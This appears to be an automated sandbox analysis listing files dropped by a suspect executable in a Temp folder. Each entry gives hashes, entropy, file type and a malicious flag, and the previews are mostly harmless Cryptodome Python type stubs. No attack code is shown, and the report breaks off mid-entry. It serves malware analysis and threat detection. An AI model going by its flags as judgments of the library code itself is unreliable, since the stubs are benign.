                                                                                                                                            SHA-512:594939FB1D9154E15106D4B4AA9EF51A6AE5062D471ED7C0779A8E3D84D8F4B1481529015E0926A3489119DA37BE6CFE70C70ED695A6E84F6AF8F65402F6AAB5
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15360
                                                                                                                                            Entropy (8bit):5.4787123381499825
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:3Z9WXA7M93g8U7soSchhiLdjM5J6ECTGmDZuRsP0rcqgjPrvE:SQ0gH7zSccA5J6ECTGmDMa89gjPrvE
                                                                                                                                            MD5:CAF687A7786892939FFF5D5B6730E069
                                                                                                                                            SHA1:96C2567A770E12C15903767A85ABF8AF57FE6D6A
                                                                                                                                            SHA-256:9001E0C50D77823D64C1891F12E02E77866B9EDE783CEF52ED4D01A32204781B
                                                                                                                                            SHA-512:0B3C9E5C1F7EF52E615D9E1E6F7D91324BAB7C97FFAFB6DBAEB229CF1B86420A3534493C34DD9FAEB4BBC3612F245248ABA34393311C31500D827538DFE24BC5
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18432
                                                                                                                                            Entropy (8bit):5.69653684522693
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:pkP5RjF7GsIyV6Lx41NVYaVmtShQRKAa8+D0ngkov:2nx7RI26LuuHKz8+D5N
                                                                                                                                            MD5:9762DBF0527A46F21852CA5303E245C3
                                                                                                                                            SHA1:33333912F16BB755B0631D8308D94DA2D7589127
                                                                                                                                            SHA-256:0DF91D69B8D585D2660168125E407E3CB3D87F338B3628E5E0C2BF49C9D20DB8
                                                                                                                                            SHA-512:52687C38939710C90A8C97F2C465AF8CF0309E3939255427B88BC461E27FADA79B0CB31F8BD215F72B610CAC093934C066141B9298353F04CC067C4E68B31DF0
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19456
                                                                                                                                            Entropy (8bit):5.798411671336839
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:cPHNP3MjevhSY/8EBbVxcJ0ihTLdFDUPHgj+kf4D:mPcKvr/jUJ0sbDoAj+t
                                                                                                                                            MD5:74DAAAB71F93BCE184D507A45A88985C
                                                                                                                                            SHA1:3D09D69E94548EC6975177B482B68F86EDA32BB8
                                                                                                                                            SHA-256:E781D6DAF2BAAA2C1A45BD1CDDB21BA491442D49A03255C1E367F246F17E13BF
                                                                                                                                            SHA-512:870EC2752304F12F2F91BE688A34812AC1C75D444A0107284E3C45987639D8D07116EB98DB76931F9C8487666E1B2C163FC5743BBFC5A72F20F040670CDEB509
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22016
                                                                                                                                            Entropy (8bit):5.86552932624144
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:V1jwGPJHLvzcY1EEerju9LcTZ6RO3RouLKtcyDNOhwgjxo:XjwyJUYToZwOLuzDNU1j
                                                                                                                                            MD5:92587A131875FF7DC137AA6195B8BD81
                                                                                                                                            SHA1:2BA642DDC869AB329893795704BFE3F23C7B6ECB
                                                                                                                                            SHA-256:D2A9484134A65EFF74F0BDA9BB94E19C4964B6C323667D68B4F45BB8A7D499FC
                                                                                                                                            SHA-512:62823A0168B415045A093ACC67E98B5E33908380860B04AA0568B04F39DE957DA30F929459C766DC9782EFC3143DCD2F4950E3876669E680B6910C213300B565
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22016
                                                                                                                                            Entropy (8bit):5.867427817795374
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:b1jwGPJHLxzcY1EEerju9LcTZ6RO3RouLKtcyDNWegjxo:ZjwyJOYToZwOLuzDNW7j
                                                                                                                                            MD5:B4E18C9A88A241FD5136FAF33FB9C96A
                                                                                                                                            SHA1:077AF274AA0336880391E2F38C873A72BFC1DE3B
                                                                                                                                            SHA-256:E50DB07E18CB84827B0D55C7183CF580FB809673BCAFBCEF60E83B4899F3AA74
                                                                                                                                            SHA-512:81A059115627025A7BBF8743B48031619C13A513446B0D035AA25037E03B6A544E013CAAEB139B1BE9BA7D0D8CF28A5E7D4CD1B8E17948830E75BDFBD6AF1653
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):5.860145427724178
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:TFDL3RqE3MjjQ95UnLa+1WT1aA7qHofg5JptfISH2mDDFfgjVx2:xDLh98jjRe+1WT1aAeIfMzxH2mDDqj
                                                                                                                                            MD5:34A0AD8A0EB6AC1E86DC8629944448ED
                                                                                                                                            SHA1:EF54E4C92C123BE341567A0ACC17E4CEE7B9F7A8
                                                                                                                                            SHA-256:03E93C2DCC19C3A0CDD4E8EFCDE90C97F6A819DFECF1C96495FDC7A0735FAA97
                                                                                                                                            SHA-512:A38EDE4B46DC9EFA80DFB6E019379809DF78A671F782660CD778427482B0F5987FA80A42C26FB367604BAFCD4FD21ABD1C833DAF2D4AEA3A43877F54D6906E21
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):5.916758045478156
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:LFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXCElrgjhig:5YLB9Mgj0e+1WT1aAeIfMzx320DXR+j
                                                                                                                                            MD5:F028511CD5F2F925FD5A979152466CB4
                                                                                                                                            SHA1:38B8B44089B390E1F3AA952C950BDBE2CB69FBA5
                                                                                                                                            SHA-256:0FB591416CC9520C6D9C398E1EDF4B7DA412F80114F80628F84E9D4D37A64F69
                                                                                                                                            SHA-512:97C06A4DCEE7F05268D0A47F88424E28B063807FFBD94DABDCC3BF773AD933A549934916EB7339506624E97829AA5DC13321ADE31D528E8424FFDCF8C8407D4F
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2694
                                                                                                                                            Entropy (8bit):5.462749746031335
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:5KwpHd7fl2L+JB/CZGDGYGwgmkRpZev32Wsfcocococ/wfPPyLGMQ:BHd7Co3GBWvZsW/Q
                                                                                                                                            MD5:B70A862ABCDB8A27D1A270EDB80FF4E5
                                                                                                                                            SHA1:D3E9CD78DE4255A3FE8AD3803472012CE4E43189
                                                                                                                                            SHA-256:FDD450E0E8D8356D6D1FCDA1023543D0D69771DA94A9B865CF38CABA6C657725
                                                                                                                                            SHA-512:6FBCC7AC9174A591EC89BEFA2C2B7DEFC9C03D21348662CDA34648B595DD5A08B26E682975E185E8D3868C5B113DB1FDA4F86A19C3EEF082F56350D996C1D8CD
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2121
                                                                                                                                            Entropy (8bit):5.171713375007499
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:aF98+zvvpZuaWt1tZccj8ny7Mk8kjqu5BCViGHh29398O4Q:aF9fzvvfuaWJZccj8ny7Mk8kjqu5BCVO
                                                                                                                                            MD5:370A72919209A9DA24ED470170C6094B
                                                                                                                                            SHA1:956F71EBA4FD2B7DE4B87A7844803A0654F24E3F
                                                                                                                                            SHA-256:B8A157C035F24A8E3C29E5FF77C39836C4FDE12B7D6EBE30CB2207B565DA2B5C
                                                                                                                                            SHA-512:95E90FE1AB7BCD74B1082BAC45017BEE02CFE172CF13D0440D7B2134C314C1CD535CFF3F42BDA83E73896AD358A486D17BDFD45D2F4643505077A99B6D2E50B3
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import overload..from typing_extensions import Literal....from Cryptodome.Hash.SHA1 import SHA1Hash..from Cryptodome.Hash.SHA224 import SHA224Hash..from Cryptodome.Hash.SHA256 import SHA256Hash..from Cryptodome.Hash.SHA384 import SHA384Hash..from Cryptodome.Hash.SHA512 import SHA512Hash..from Cryptodome.Hash.SHA3_224 import SHA3_224_Hash..from Cryptodome.Hash.SHA3_256 import SHA3_256_Hash..from Cryptodome.Hash.SHA3_384 import SHA3_384_Hash..from Cryptodome.Hash.SHA3_512 import SHA3_512_Hash....@overload..def new(name: Literal["1.3.14.3.2.26"]) -> SHA1Hash: .....@overload..def new(name: Literal["SHA1"]) -> SHA1Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.4"]) -> SHA224Hash: .....@overload..def new(name: Literal["SHA224"]) -> SHA224Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.1"]) -> SHA256Hash: .....@overload..def new(name: Literal["SHA256"]) -> SHA256Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.2"]) -> SHA384Has
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12800
                                                                                                                                            Entropy (8bit):5.0002940201841
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Dz/RF/1nb2mhQtk4axusjfkgZhoYDQmRjcqgQvEty:Dz/d2f64axnTTz5DTgQvEty
                                                                                                                                            MD5:87C1C89CEB6DF9F62A8F384474D27A4A
                                                                                                                                            SHA1:B0FC912A8DE5D9C18F603CD25AE3642185FFFBDD
                                                                                                                                            SHA-256:D2256A5F1D3DC6AE38B73EA2DB87735724D29CB400D00D74CF8D012E30903151
                                                                                                                                            SHA-512:C7DFB9C8E4F4AA984416BC84E829F0BB6CD87829C86BA259EE2A9BAB7C16B15362DB9EC87BF2ACED44A6BED7B1DE03DC9450665D083205B4CD4780DCF480DA01
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13312
                                                                                                                                            Entropy (8bit):5.025717576776578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:FF/1nb2mhQtks0iiNqdF4mtPjD0HA5APYcqgYvEL2x:R2f6fFA/4GjDucgYvEL2x
                                                                                                                                            MD5:20702216CDA3F967DF5C71FCE8B9B36F
                                                                                                                                            SHA1:4D9A814EE2941A175BC41F21283899D05831B488
                                                                                                                                            SHA-256:3F73F9D59EB028B7F17815A088CEB59A66D6784FEEF42F2DA08DD07DF917DD86
                                                                                                                                            SHA-512:0802CF05DAD26E6C5575BBECB419AF6C66E48ED878F4E18E9CEC4F78D6358D751D41D1F0CCB86770A46510B993B70D2B320675422A6620CE9843E2E42193DCD8
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16384
                                                                                                                                            Entropy (8bit):5.235441330454107
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:VTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gD/gvrjcqgCieT3WQ:VafgNpj9cHW3jqXeBRamD4ZgCieT
                                                                                                                                            MD5:F065FFB04F6CB9CDB149F3C66BC00216
                                                                                                                                            SHA1:B2BC4AF8A3E06255BAB15D1A8CF4A577523B03B6
                                                                                                                                            SHA-256:E263D7E722EC5200E219D6C7D8B7C1B18F923E103C44A0B5485436F7B778B7BD
                                                                                                                                            SHA-512:93E583B10D0F2BBB1D5539FF4E943A65BC67F6DFC51E5F991481574F58757F4D49A87022E551069F6FC55D690F7B1412CF5DE7DD9BEE27FB826853CE9ACC2B40
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15360
                                                                                                                                            Entropy (8bit):5.133851517560629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:zZNGXEgvUh43G6coX2SSwmPL4V7wTdDlDaY2cqgWjvE:mVMhuGGF2L4STdDEYWgWjvE
                                                                                                                                            MD5:213AAEC146F365D950014D7FFF381B06
                                                                                                                                            SHA1:66FCD49E5B2278CD670367A4AC6704A59AE82B50
                                                                                                                                            SHA-256:CAF315A9353B2306880A58ECC5A1710BFE3AA35CFEAD7CF0528CAEE4A0629EAD
                                                                                                                                            SHA-512:0880D7D2B2C936A4B85E6C2A127B3509B76DB4751A3D8A7BB903229CABC8DE7A7F52888D67C886F606E21400DFC51C215D1CF9C976EB558EA70975412840883A
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):513
                                                                                                                                            Entropy (8bit):4.65254840298011
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3AJ1ApWaN5hFeLBaFeLsQwWh72CX5AJaNi4Y:1REcT34A1N56Vp7h71GENiL
                                                                                                                                            MD5:650178B2B4C1BBE35CB633D193929B0B
                                                                                                                                            SHA1:08A93F8C458ED63BB136821EF52ADF04B70C02A8
                                                                                                                                            SHA-256:996DE23B6A41D7158B3C0DD8B3DE5DE532F6953706640866CBE19243A882F3A3
                                                                                                                                            SHA-512:628B50274BDFA31ABCA9D06A433C493C0953C3F8BBB4949BC83EBF370F383F182D80DAF12850388F0B0EB0D989A6CA3E34329CFF9FB8051F4E649DA6F47B8C3E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class cSHAKE_XOF(object):.. def __init__(self,.. data: Optional[Buffer] = ...,.. function: Optional[bytes] = ...,.. custom: Optional[bytes] = ...) -> None: ..... def update(self, data: Buffer) -> cSHAKE_XOF: ..... def read(self, length: int) -> bytes: .......def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> cSHAKE_XOF: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):243
                                                                                                                                            Entropy (8bit):5.025929082655644
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBXy1kwQORyoczrIY3MTDyJaNyRD4JRQ:1REYBCk5FHvIY3YyJaNi4Y
                                                                                                                                            MD5:B419DCDBEE755F0B775F7CA84AC2C4F2
                                                                                                                                            SHA1:0AFA02C4AC01B3CBD27E24105AED4EB9F6553889
                                                                                                                                            SHA-256:5DA57A092D8D896CE5D295D7DD69D56B6EF1E4AA38294346F7EA0A6FDC56AEF2
                                                                                                                                            SHA-512:E70A94DA054A7DEB6ECB6F877BE8D798DEE8614864759364F4AF3BA7F1A67218C699F1BDCEEB41693A28178266DA10E3370F8704A7EAB79F702EE73184EC06C7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....from Cryptodome.Hash.cSHAKE128 import cSHAKE_XOF....Buffer = Union[bytes, bytearray, memoryview]....def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> cSHAKE_XOF: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7860
                                                                                                                                            Entropy (8bit):5.277294583519957
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:7QVykvuFz0Z5E7QYp9dtLTH0Ger1EwIMmsyl5wRoLBviRlTPMnDHvYKW:77LlrB+YMmsyDwRmGTPGDHAKW
                                                                                                                                            MD5:B7814443F54CC8B84396FA35CD8190C2
                                                                                                                                            SHA1:05E522837855122D3144A8D6D8DDB3C6D78C6D65
                                                                                                                                            SHA-256:84316E25C90AC3CD96701AB806A8ECF5716E5BA7390CDEDAF4353339C5C9150D
                                                                                                                                            SHA-512:B4528A0BFEB80AAEA4664084239E749646AB060828125EA10BED3636B6C4FF7ADE5A413FC1B4EB43C378DF5D6D475009FC66A5FF8F732F36E05AA0866AD8AA11
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e8.........................t.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptr..c_ubytez.Cryptodome.Hash._keccaka..... int keccak_init(void **state,. size_t capacity_bytes,. uint8_t rounds);. int keccak_destroy(void *state);. int keccak_absorb(void *state,. const uint8_t *in,. size_t len);. int keccak_squeeze(const void *state,. uint8_t *out,. size_t len,. uint8_t padding);. int kecca
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):764
                                                                                                                                            Entropy (8bit):4.362163899247177
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBhvIY3PHpRyD1Ap1uw+z65JX3LBq3v37lz04LBK3P3blzO:1REYT3v/IALWz6LLBkPhz04LBEvBzO
                                                                                                                                            MD5:0A2310BA7677F27E22A421132A86D382
                                                                                                                                            SHA1:A976C8749DEE4E295DD8C808E2A7A47922E86BB4
                                                                                                                                            SHA-256:3A1DB3E7321EFB30C4AAF0FAD5728728C7AADCEBBBE91E4272940DB1F9A677F9
                                                                                                                                            SHA-512:6526BCDFF7B41EB7E94F83A2E1A770D6216E4C575410E8689C7119F6A53170CAA5B2F8AED037EB5AB40C7CA361C2E7208BF3F19C69D8E619150A1C68779FE22C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Any....Buffer = Union[bytes, bytearray, memoryview]....class Keccak_Hash(object):.. digest_size: int.. def __init__(self,.. data: Buffer,.. digest_bytes: int,.. update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> Keccak_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,.. data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .......def new(data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):313
                                                                                                                                            Entropy (8bit):4.63314311726341
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBbAmV4uDbIBFeLBysOZ4fJEBd1pHWERrBFeLsEiJos:1REYBbr+uWFeLB/OifJEjv2EDFeLsEi5
                                                                                                                                            MD5:107D6CC5B80CF3E12D074590F5D47AE5
                                                                                                                                            SHA1:E89B8FCF239CD49A0CFC3D7561C783EA63E2FD19
                                                                                                                                            SHA-256:FD17DE9B1D9EEB3950223BE5E5B16A8CA3EE0A7E4822557F0B882BFF3D67A1D0
                                                                                                                                            SHA-512:B6E46F3846AFB5E59C5C6C1454FEEEC7FDAA01665F811BFE5338035A5D34CE16347F58EE9921118BEE11D73DE9A5CC56B2B5CC5257EF406D90E495DE3F0C0435
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple, Optional, Callable....def encode(data: bytes,.. marke: str,... passphrase: Optional[bytes] = ...,... randfunc: Optional[Callable[[int],bytes]] = ...) -> str: .........def decode(pem_data: str,.. passphrase: Optional[bytes] = ...) -> Tuple[bytes, str, bool]: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):625
                                                                                                                                            Entropy (8bit):4.78655012770183
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBbr0mRE1BWSkhUekAvjJMmxKxoIiNLojqyW38RJifJEvP5peYmrEidkLvFye:1REAYmC1X4RJMme4Loey1RMEnzurA/
                                                                                                                                            MD5:4EC2FE876B8F8B970CC897F91F28413F
                                                                                                                                            SHA1:E925613B314EA8285553CDC532F9F53BF9DFC3B8
                                                                                                                                            SHA-256:FAD405161C2DC747135241B41988E65295D43B7F3F971FCCFC8B76D634C7D144
                                                                                                                                            SHA-512:BB2DC865D3567C409F0EFA2EF0FE90C13B8825628CEFAA07CC8DAD7D8AC6A8E6F4C84C308E71AB23FBD14E2E9B9A77A592870275E8DFD56D15547C68BAED14A7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple, Optional, Union, Callable..from typing_extensions import NotRequired....from Cryptodome.Util.asn1 import DerObject..from Cryptodome.IO._PBES import ProtParams......def wrap(private_key: bytes,.. key_oid: str,.. passphrase: Union[bytes, str] = ...,.. protection: str = ...,.. prot_params: Optional[ProtParams] = ...,.. key_params: Optional[DerObject] = ...,.. randfunc: Optional[Callable[[int], str]] = ...) -> bytes: .........def unwrap(p8_private_key: bytes, passphrase: Optional[Union[bytes, str]] = ...) -> Tuple[str, bytes, Optional[bytes]]: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):781
                                                                                                                                            Entropy (8bit):4.711755021635503
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBrqRE1BWIWK+li56EotVepVnKqYjqytJifJEjP51K+lEhB5q:1REBC1WK+cH+mnKLeytMErDK+KQ
                                                                                                                                            MD5:104D32B3D75141B0546625AC5336C1EC
                                                                                                                                            SHA1:BDF345B0EBE5DC7E238D79FBD5FD63362C561195
                                                                                                                                            SHA-256:816463C1012174C626FDF286098D851BF55E201879FE9DEEADF777FD1CEA0794
                                                                                                                                            SHA-512:70AA3BEDD20562702462F69EF3209DF71C1CBDA73BDDDA451E7A2B490095AA1FEDEA4D7093BB8DB955148396A7F28BA9E7D8AC0B1B4644E4F252DED8A780A633
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Callable, TypedDict..from typing_extensions import NotRequired....class PbesError(ValueError):.. .......class PBES1(object):.. @staticmethod.. def decrypt(data: bytes, passphrase: bytes) -> bytes: .......class ProtParams(TypedDict):.. iteration_count: NotRequired[int].. salt_size: NotRequired[int].. block_size: NotRequired[int].. parallelization: NotRequired[int]....class PBES2(object):.. @staticmethod.. def encrypt(data: bytes,.. passphrase: bytes,.. protection: str,.. prot_params: Optional[ProtParams] = ...,.. randfunc: Optional[Callable[[int],bytes]] = ...) -> bytes: ....... @staticmethod.. def decrypt(data:bytes, passphrase: bytes) -> bytes: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88
                                                                                                                                            Entropy (8bit):4.462417333166609
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1mMyErOsLmL3VosL1ydxFo+CsaCAX7y:1kmL+fW4CAe
                                                                                                                                            MD5:E7E9C2906D778296EE3697954FE42DBF
                                                                                                                                            SHA1:C264743278627EB4EEC6DCB528C2A274C4C1EA4F
                                                                                                                                            SHA-256:36E3014B15693406377C64FBC0E58407E6419A3FF10816F1FC5961DA545ED142
                                                                                                                                            SHA-512:D2A0D38B85C8F52E839F8146B8EF6CAC086BEE7C06733BE60B61C549BC2C652D9EEA5399781BD3E9D0B7DF0D8A5F931837868614226540B9CA90EEDD016C972A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from Cryptodome.Math._IntegerBase import IntegerBase as Integer..__all__ = ['Integer']..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):841
                                                                                                                                            Entropy (8bit):4.5810465816498
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REqa50Kg2G2+kEgR8WSgEgRnxDNaVSYnblDNaj:wCKzG2+NgVSBgZxDQVrRDQj
                                                                                                                                            MD5:A3ADEC74F909A4E9CFB74C5EFFD5162D
                                                                                                                                            SHA1:4325C3C9FD0FDA73843197C2B99E55C5DCACDFE4
                                                                                                                                            SHA-256:F73DAEA86E4577FDE3B6E314A1DA38441A8F0CA8AC64A018821E10706B80C903
                                                                                                                                            SHA-512:F0A41213290CA4D46C1A012D8FBF38B3E16D05D61BF815634EC587B03644F707D5726BFB264AE504BFB4A070210A2CCE1898B25A0697504C6B557D06BF7B2894
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Optional, Union, Set....PrimeResult = int....COMPOSITE: PrimeResult..PROBABLY_PRIME: PrimeResult....def miller_rabin_test(candidate: int, iterations: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def lucas_test(candidate: int) -> PrimeResult: ....._sieve_base: Set[int]..def test_probable_prime(candidate: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def generate_probable_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...,.. prime_filter: Callable[[int],bool] = ...) -> int: .....def generate_probable_safe_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...) -> int: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3810
                                                                                                                                            Entropy (8bit):4.6872218402303165
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REjiTAaR+gZ2KDRSjmnV69RuezESHcAFPS+ep0npIk/6I3ZuieIeKvJK5fCKsLm:giTnXDojmW8ABwi+M30W85fzsLm
                                                                                                                                            MD5:00C57D206A1CD7FC853656AF026AEC7E
                                                                                                                                            SHA1:0C3FDC977E7AE71D989B208A61DB93C66601177E
                                                                                                                                            SHA-256:C8A26AFF672F06B9C4D80286E0EF8DDE8B2B41FF4C317AB75ACA0FD0D01C751E
                                                                                                                                            SHA-512:74ECC9628812D52785545D3C5304AD5735C8D6C484C389B46F5D61AFCB339F136931C9A7A7759A6656028277B16ED6C21475F2E741B466516A9CA95BA5F61773
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Union, Callable....RandFunc = Callable[[int],int]....class IntegerBase:.... def __init__(self, value: Union[IntegerBase, int]): ....... def __int__(self) -> int: ..... def __str__(self) -> str: ..... def __repr__(self) -> str: ..... def to_bytes(self, block_size: Optional[int]=0, byteorder: str= ...) -> bytes: ..... @staticmethod.. def from_bytes(byte_string: bytes, byteorder: Optional[str] = ...) -> IntegerBase: ..... def __eq__(self, term: object) -> bool: ..... def __ne__(self, term: object) -> bool: ..... def __lt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __le__(self, term: Union[IntegerBase, int]) -> bool: ..... def __gt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __ge__(self, term: Union[IntegerBase, int]) -> bool: ..... def __nonzero__(self) -> bool: ..... def is_negative(self) -> bool: ..... def __add__(self, term: Union[IntegerBase, int]) -> IntegerBase: ..... def __su
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
